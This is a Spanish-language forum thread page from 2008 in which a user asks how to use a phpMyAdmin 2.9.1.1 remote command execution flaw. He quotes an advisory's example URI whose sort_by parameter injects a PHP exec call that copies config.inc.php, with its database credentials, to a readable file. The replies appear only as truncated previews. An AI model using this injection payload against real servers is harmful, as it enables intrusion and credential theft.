Bienvenido, invitado ( Identificarse | Registrarse )

> Reglas de este Subforo

1) No publicar cualquier tipo de publicidad como ofertas de trabajo, ofertas de productos o servicios.
2) No publiques contenido con derechos de autor.
3) No solicitar cracks/seriales/generadores-de-llaves.

Ayuda vulnerabilidad phpmyadmin
drak91
mensaje 31/10/2008 00:18
Publicado: #1
Lurker




Grupo: Lurker
Mensajes: 1
Registrado: 10/02/2008
Ranking : 1848 º/ 9.26
Avance : 0.67 %
All Stars
SeguridadSistemas Operativos
Rank: ON
Muy buenas.

Les escribo para preguntar si alguno sería tan amable de explicarme como funciona esta vulnerabilidad en el phpmyadmin versión 2.9.1.1

El código es el siguiente:

phpMyAdmin 'server_databases.php' Remote Command Execution Vulnerability

Class: Input Validation Error
CVE: CVE-2008-4096
CVE-2008-3197
Remote: Yes
Local: No

The following example URI is available:

http://www.example.com/server_databases.ph...;sort_by="]) OR exec('cp $(pwd)"/config.inc.php" config.txt'); //&sort_order=desc&token=[valid token]



El problema es que no se que parametros cambiar en esa url de prueba, lo único evidente es lo de example.com, cambiarlo por la direccion del phpmyadmin en cuestión, pero nada más...

Muchas gracias a todos de antemano.
Go to the top of the page
 
+Quote Post

Mensajes en este tema
- drak91   Ayuda vulnerabilidad phpmyadmin   31/10/2008 00:18
- - Trancek   un bonito RCE que para explotarlo necesitas un tok...   31/10/2008 12:47
|- - drak91   CITA(Trancek @ 31/10/2008 13:47) un bonit...   04/11/2008 21:34
- - g30rg3_x   CITA(drak91 @ 04/11/2008 15:34) Y me podr...   04/11/2008 22:21
- - thechoiceone   hola: segun veo esta vulnerabilidad te da las pass...   10/11/2008 20:53

 

Reply to this topicStart new topic
2 usuario(s) está(n) leyendo esta discusión (2 invitado(s) y 0 usuario(s) anónimo(s))
0 miembro(s):

 

RSS Versión Lo-Fi Fecha y Hora actual: 20/04/2024 08:11